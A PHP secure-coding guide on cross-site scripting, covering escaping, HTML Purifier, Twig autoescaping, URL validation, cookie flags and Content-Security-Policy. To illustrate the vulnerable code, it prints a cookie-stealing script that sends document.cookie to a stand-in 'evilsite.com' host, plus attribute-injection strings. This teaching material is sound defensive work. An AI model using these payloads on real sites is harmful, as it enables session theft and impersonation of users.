Everything You Need to Know About Preventing Cross-Site Scripting Vulnerabilities in PHP

Cross-Site Scripting (abbreviated as XSS) is a class of security vulnerability whereby an attacker manages to use a website to deliver a potentially malicious JavaScript payload to an end user.

XSS vulnerabilities are very common in web applications. They're a special case of code injection attack; except where SQL injection, local/remote file inclusion, and OS command injection target the server, XSS exclusively targets the users of a website.

There are two main varieties of XSS vulnerabilities we need to consider when planning our defenses:

Stored XSS occurs when data you submit to a website is persisted (on disk or in RAM) across requests, usually with the goal of executing when a privileged user access a particular web page.

occurs when data you submit to a website is persisted (on disk or in RAM) across requests, usually with the goal of executing when a privileged user access a particular web page. Reflective XSS occurs when a particular page can be used to execute arbitrary code, but it does not persist the attack code across multiple requests. Since an attacker needs to send a user to a specially crafted URL for the code to run, reflective XSS usually requires some social engineering to pull off.

Cross-Site Scripting vulnerabilities can be used by an attacker to accomplish a long list of potential nefarious goals, including:

Steal your session identifier so they can impersonate you and access the web application.

Redirect you to a phishing page that gathers sensitive information.

Install malware on your computer (usually requires a 0day vulnerability for your browser and OS).

Perform tasks on your behalf (i.e. create a new administrator account with the attacker's credentials).

Cross-Site Scripting represents an asymmetric in the security landscape. They're incredibly easy for attackers to exploit, but XSS mitigation can become a rabbit hole of complexity depending on your project's requirements.

Brief XSS Mitigation Guide

If your framework has a templating engine that offers automatic contextual filtering, use that. Make sure you use the appropriate context flags (e.g. url , html_attr , html ). Context matters to XSS prevention. echo htmlentities($string, ENT_QUOTES | ENT_HTML5, 'UTF-8'); is a safe and effective way to stop all XSS attacks on a UTF-8 encoded web page, but doesn't allow any HTML. If your requirements allow you to use e.g. Markdown instead of HTML, then don't use HTML. If you need to allow some HTML and aren't using a templating engine (see #1), use HTML Purifier. For user-provided URLs, you additionally want to only allow http: and https: schemes; never javascript: . Furthermore, URL encode any user input.

The rest of this document explains cross-site scripting vulnerabilities and their mitigation strategies in detail.

What Does a XSS Vulnerability Look Like?

XSS vulnerabilities can occur in any place where information which can be altered by any user is included in the output of a webpage without being properly escaped.

Example 1

<div id="profile"><?php echo $user['profile']; ?></div>

This is a potential stored XSS infection point (assuming the profile field was pulled straight from the database without escaping). If the malicious user is able to include a snippet that looks like this, they can exploit any authenticated user that visits their profile and steal their cookies for future impersonation efforts:

<script> window.open("http://evilsite.com/cookie_stealer.php?cookie=" + document.cookie, "_blank"); </script>

Example 2

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

The above snippet is vulnerable to reflective XSS attacks. Just trick a user into visiting /form.php?%22%20onload%3D%22alert(%27XSS%27)%3B and they will see an alert box pop up containing the message 'XSS' when your page loads.

<form action="/form.php?" onload="alert('XSS');" method="post">

Unlike SQL Injection, which prepared statements defeat 100% of the time, cross-site scripting doesn't have an industry standard strategy for separating data from instructions. You have to escape special characters to prevent attacks.

The Quick and Dirty XSS Mitigation Technique for PHP Applications

The simplest and most effective way to prevent XSS attacks is the nuclear option: Ruthlessly escape any character that can affect the structure of your document.

For best results, you want to use the built-in htmlentities() function that PHP offers instead of playing with string escaping yourself.

<?php /** * Escape all HTML, JavaScript, and CSS * * @param string $input The input string * @param string $encoding Which character encoding are we using? * @return string */ function noHTML($input, $encoding = 'UTF-8') { return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding); } echo '<h2 title="', noHTML($title), '">', $articleTitle, '</h2>', "

"; echo noHTML($some_data), "

";

The security of this construction depends on the presence of the ENT_QUOTES flag when to escape HTML attribute values. It's important to note that this prevents any HTML characters in $some_data from displaying on the web page.

Why ENT_QUOTES | ENT_HTML5 and 'UTF-8' ?

We specify ENT_QUOTES to tell htmlentities() to escape quote characters ( " and ' ). This is helpful for situations such as:

<input type="text" name="field" value="<?php echo $escaped_value; ?>" />

If you failed to specify ENT_QUOTES and attacker simply needs to pass " onload="malicious javascript code as a value to that form field and presto, instant client-side code execution.

We specify ENT_HTML5 and 'UTF-8' so htmlentities() knows what character set and version of the HTML standard to work with.

The reason we need to specify both values is, as demonstrated against mysql_real_escape_string() , an incorrect (especially attacker-controlled) character encoding can defeat string-based escaping strategies.

For the sake of safety and consistency, the encoding we specify here, the encoding sent in the charset attribute of the <meta> tag, and the charset added to the Content-Type HTTP header should all match.

Important - Avoid Premature Optimization

Always escape data on output (when displaying to a user).

Do not escape user input against XSS attacks before inserting into a database. WordPress made this mistake and eventually security researcher Jouko Pynnönen of Klikki Oy realized MySQL column truncation can defeat before-insert XSS prevention strategies.

You should still be validating your input, however. If you're expecting an email address, make sure it's formatted like one.

$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL); if ($email === false) { // Not a valid email address! Handle this invalid input here. }

If you're using MySQL, make sure any values going into a TEXT field will fit in less than 64 KiB. MySQL will truncate TEXT fields if any value exceeds that length, which can cause both security issues (as WordPress experienced) as well as data integrity issues.

The "escape all HTML entities" approach is secure and works wonderfully for situations where users should not be providing their own HTML markup. But what if you need to allow some markup, while not opening the door for any markup?

Put another way: How can we allow users to provide their own rich text markup without allowing them to execute arbitrary JavaScript in visitors' browsers?

Avoid HTML If You Can

An attractive solution is to adopt a rendering format such as BBCode, Markdown, or ReStructuredText instead of allowing raw HTML. This allows us to continue to reject all HTML entities while still allowing a limited subset markup options to make a user's contributions more expressive and powerful.

If you can avoid accepting raw HTML by using another markup language such as Markdown, please do so. If you can bolt a WYSIWYG onto it for non-technical users, even better.

This means doing the following:

Escape ALL HTML first, so arbitrary HTML is not passed to the renderer. Render the output of step 1.

For example:

<?php declare(strict_types=1); namespace Foo\Bar; use League\CommonMark\CommonMarkConverter; class ExampleRenderer { /** @var CommonMarkConverter $markdown */ protected $markdown; public function __construct(CommonMarkConverter $markdown) { $this->markdown = $markdown; } /** * Escape HTML, then pass to the Markdown renderer. * * @param string $input * @return string */ public function renderUserInput(string $input): string { return $this->markdown->convertToHtml(self::noHTML($input)); } /** * Escape all HTML, JavaScript, and CSS * * @param string $input The input string * @param string $encoding Which character encoding are we using? * @return string */ public static function noHTML(string $input, string $encoding = 'UTF-8'): string { return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding); } }

Note, however, that your output will in most cases still be HTML, so don't stop reading here.

An Order of HTML Please, Hold the XSS Payload

Although we can easily stop all XSS attacks by preventing any HTML markup characters from breaking the document structure, this is often not the desired outcome. For some use cases (blog comments, user profiles, etc.) we want to allow our end users to be free to express themselves, within reason. But at the same time, we don't want users to be able to abuse this potential for customization to attack other users.

How can we resolve this conflict? Simple: Use a library such as HTML Purifier. Most of the clever XSS tricks hidden in the HTML specification are easily defeated by HTMLPurifier, if used correctly.

How to Use HTMLPurifier to Stop XSS Attacks

Instead of attempting to naively search and replace malicious snippets in a string of user input, HTML Purifier digests the entire string as an HTML document, breaks it into tokens, and validates all elements and attributes against a whitelist and the RFC definitions for each attribute.

<?php /** * Setup HTML Purifier */ require_once '/path/to/HTMLPurifier.auto.php'; $config = HTMLPurifier_Config::createDefault(); $htmlp = new HTMLPurifier($config); /* etc. */ ?> <!-- etc etc etc. --> <div id="profile"><?php // Use HTML Purifier to prevent XSS in this user's profile echo $htmlp->purify($user['profile']); ?></div>

Optimizing HTMLPurifier

Running HTML Purifier on every page load is a performance concern that can be easily fixed by caching. When you insert data into your database, keep the original values intact (e.g. for logging and threat intelligence purposes), but also store a purified version and use the purified HTML when displaying to end users.

This "store, purify, cache, serve from cache" strategy allows you to enjoy the performance benefits developers normally get from filtering on input, but without causing a permanent loss of data. It also allows you to re-purify your original values in the event that you need to (e.g. if HTML Purifier has a bug with HTML5 output and they release a new version that fixes it).

$db->insert('blog_comments', [ /* Other fields */ 'original_body' => $_POST['body'], 'rendered_body' => $htmlp->purify($_POST['body']) ]);

Important: When Not to Use HTML Purifier

HTML Purifier expects to operate in the context of an HTML document, not a string within an HTML attribute. The library isn't psychic. It cannot tell what the rest of the web page is doing immediately before and after the string you invoke it on an untrusted string.

For example, even though it's using HTML Purifier, the following snippet is still insecure:

<input type="text" name="username" value="<?php echo $htmlp->purify($_GET['username']); ?>" />

Simply pass the string " onload="alert('XSS'); to username and you have client-side code execution.

When inserting any variables into another context, you should also run them through htmlspecialchars() (or noHTML() above) to ensure they don't break out and add extra attributes to the parent element.

This is safe:

<input type="text" name="username" value="<?php echo noHTML($htmlp->purify($_GET['username'])); ?>" />

This, too, is safe against XSS attacks, but still a bad idea:

<?php echo $htmlp->purify("<input type=\"text\" name=\"username\" value=\"".$_GET['username']."\" />"); ?>

As it turns out, context matters a lot for preventing cross-site scripting attacks. What's secure in one context (e.g. HTML is allowed) could be disastrous in other contexts (e.g. we're in the middle of an HTML attribute).

What About Other Contexts?

We've uncovered two rules for preventing XSS attacks so far:

Always escape all HTML entities (i.e. with noHTML() defined above) when inserting data to an HTML attribute. Always purify (i.e. with HTML Purifier) when you wish to allow safe HTML from the input string to appear in the rendered web page.

What do we do if we want to add a user-provided parameter to a style tag or attribute? What if we want to define a default value to a JavaScript variable? What about hyperlinks?

Context-Sensitive HTML Escaping in Template Engines

Every context within an HTML document requires distinct escaping rules that are not always relevant to other contexts. Fortunately, there's an easy way to tackle all this complexity without a great deal of effort or research: Use templating libraries.

A popular PHP templating engine, Twig, makes contextual XSS filtering a walk in the park:

{% autoescape 'css' %} <p style="color: {{ color|default('#0f0') }};">Test</p> {% endautoescape %} {% autoescape 'html' %} {{ some_var }} {{ not_user_provided|raw }} <p class="{{ class|e('html_attr') }}"> <a href="/user/{{ username|e('url') }}">{{ username }}</a> </p> {% endautoescape %}

If you're using Twig, you should prefer wrapping entire sections in {% autoescape %} blocks above applying |e filters to every printed template variable. Not only does auto-escaping make your code easier to read, but it prevents a single oversight from becoming an entry point for an attacker with a malicious payload.

What If I Cannot Use a Templating Engine?

Then you're doomed to reinvent the wheel, possibly insecurely.

Strip HTML where ever you don't absolutely need to allow it.

Use something like HTMLPurifier to prevent XSS when rich content is required, even if there's an intermediary step (e.g. a Markdown renderer) in the midst.

Safely Handling Hyperlinks Without a Templating Engine

If you need to accept arbitrary URLs from your users, and you aren't using a templating engine that supports context-aware URL escaping, apply the following rules:

Only allow https: URI schemes. Possibly http: . Never javascript: . URL-encode any user input before stripping HTML.

For example:

<?php declare(strict_types=1); namespace Foo\Bar; class UserProvidedLinks { /** @var array $allowedSchemes */ protected $allowedSchemes = []; public function __construct(array $allowedSchemes = ['https']) { $this->allowedSchemes = $allowedSchemes; } /** * Only allow valid schemes * * @param string $url * @return string */ public function validateUrl(string $url): string { $parsed = parse_url($url); if (!\is_array($parsed)) { return '#'; } if (!\in_array($parsed['scheme'], $this->allowedSchemes, true)) { return '#'; } return $url; } }

Usage:

<?php $filter = new Foo\Bar\UserProvidedLinks([ 'http', 'https' ]); // Full URL provided by user echo '<a href="', noHTML( $filter->validateUrl($userProvidedLink) ), '">', noHTML($userProvidedLabel), '</a>', PHP_EOL; // Partial URL provided by user: echo '<a href="https://example.com/page/', noHTML(urlencode($page)), '">', noHTML($label), '</a>', PHP_EOL;

Browser-Level XSS Mitigation

There are a number of security features supported by all modern web browsers that significantly reduce the impact of XSS vulnerabilities. Even if you manage to escape every variable you output, it would be a very good idea to use these features. We are going to focus on two: HTTPS-Only Cookies (which means HTTP-Only cookies which only transmit over TLS) and Content-Security-Policy headers.

Secure Cookies

Any time you set a cookie in PHP, you should set both httpOnly and secure to true . (This assumes your website is only accessible over HTTPS, which it should be.)

Your session cookie should, especially, not be made available to Javascript. This can be achieved either through adding these lines to php.ini , or by setting them manually on every request:

session.cookie_httponly = On session.cookie_secure = On

Setting the session cookie parameters on every page load:

session_set_cookie_params( 0, // Lifetime -- 0 means erase when browser closes '/', // Which paths are these cookies relevant? '.yourdomain.com', // Only expose this to which domain? true, // Only send over the network when TLS is used true // Don't expose to Javascript ); session_start();

Content-Security-Policy headers

Content-Security-Policy headers significantly reduce the risk and impact of XSS attacks in modern browsers by specifying a whitelist in the HTTP response headers which dictate what the HTTP response body can do. They don't protect against an attacker capable of modifying the source files on the server, but most real-world XSS vulnerabilities will fail to execute if they are used properly.

An example of a CSP header looks like this:

Content-Security-Policy: script-src 'self' https://ajax.googleapis.com https://www.google-analytics.com; child-src 'none'; object-src 'none'; upgrade-insecure-requests

HTML5 Rocks has a great introductory tutorial for Content-Security-Policy headers if you would like to learn more about writing them.

Paragon Initiative Enterprise's CSP Compiler

Ever wanted to make Content-Security-Policy headers easier to manage? Whether you'd rather just edit a JSON file than remember the syntax of a CSP header, or if you'd rather build the headers for a particular request programmatically (e.g. to use the script-nonce feature), check out our MIT-licensed CSP Builder project.

Summary

Use Content-Security-Policy headers and HTTPS-only cookies. Your first line of defense against XSS attacks should be filtering any tainted information before inserting them in the DOM not before storing it in a database. If you can avoid accepting actual HTML by opting for Markdown, etc. then don't accept HTML. If you're using a templating engine such as Twig, use {% autoescape %} directives and |e filters where appropriate. {% autoescape %} should be prioritized over escaping every variable. If you're not using a templating engine and need to safely render user-provided HTML, use HTML Purifier. Feel free to leverage caching for optimization, but keep an intact copy on-hand. Otherwise, use noHTML() and leave nothing to chance. For hyperlinks: Don't allow javascript: URIs, full stop. Consider whitelisting https: . URL-encode all user input.

External Links and Resources

We Consult

We are a team of technology consultants, web developers, code reviewers, and application security specialists based in Orlando, FL. If you're concerned about the risk of cross-site scripting in your business applications, get in touch with us today.